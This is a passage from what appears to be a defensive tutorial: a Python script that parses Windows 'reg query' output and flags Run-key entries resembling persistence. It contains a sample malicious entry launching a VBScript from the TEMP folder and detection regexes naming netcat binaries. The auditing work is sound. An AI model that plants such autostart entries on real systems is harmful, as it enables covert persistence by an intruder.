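    UpdateAgent     REG_SZ    wscript.exe C:\WINDOWS\TEMP\agent.vbs

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    ctfmon          REG_SZ    C:\WINDOWS\system32\ctfmon.exe
"""

KEY_RE = re.compile(r"^(HKEY_[A-Z_]+\\.*)$")                                  # a key header line
VALUE_RE = re.compile(r"^\s+(?P<name>\S+)\s+(?P<type>REG_\w+)\s+(?P<data>.+?)\s*$")  # name  type  data
TEMP_DIR_RE = re.compile(r"\\te?mp\\", re.IGNORECASE)                         # ...\TEMP\ or ...\tmp\
SCRIPT_RE = re.compile(r"\b(wscript|cscript|mshta|powershell)\.exe\b|\.(vbs|js|bat|ps1)\b", re.IGNORECASE)
SHELL_BIN_RE = re.compile(r"\b(nc|ncat)\.exe\b", re.IGNORECASE)


def parse_reg_query(text):
    """Turn reg-query-style text into a list of {key, name, type, data} entries."""
    entries, current_key = [], None
    for line in text.splitlines():
        km = KEY_RE.match(line)
        if km:
            current_key = km.group(1)
            continue
        vm = VALUE_RE.match(line)
        if vm and current_key:
            entries.append({"key": current_key, **vm.groupdict()})
    return entries


def audit_run_entries(entries):
    """Return the entries that look like persistence, each with the reasons it was flagged."""
    suspicious = []
    for entry in entries:
        data, reasons = entry["data"], []
        if TEMP_DIR_RE.search(data):
            reasons.append("executes from a temporary directory")
        if SCRIPT_RE.search(data):
            reasons.append("launches a script host or script file")
        if SHELL_BIN_RE.search(data):
            reasons.append("references a known network-shell binary")
        if reasons:
            suspicious.append({**entry, "reasons": reasons})
    return suspicious


if __name__ == "__main__":
    for hit in audit_run_entries(parse_reg_query(SAMPLE_REG_QUERY)):
        print(hit["key"], hit["name"], hit["data"], "->", "; ".join(hit["reasons"]))
```

The heuristics are deliberately simple; in practice the same audit is extended to RunOnce, the Winlogon and Services keys, and scheduled tasks, and each hit is checked against a baseline of what the machine's image is expected to start.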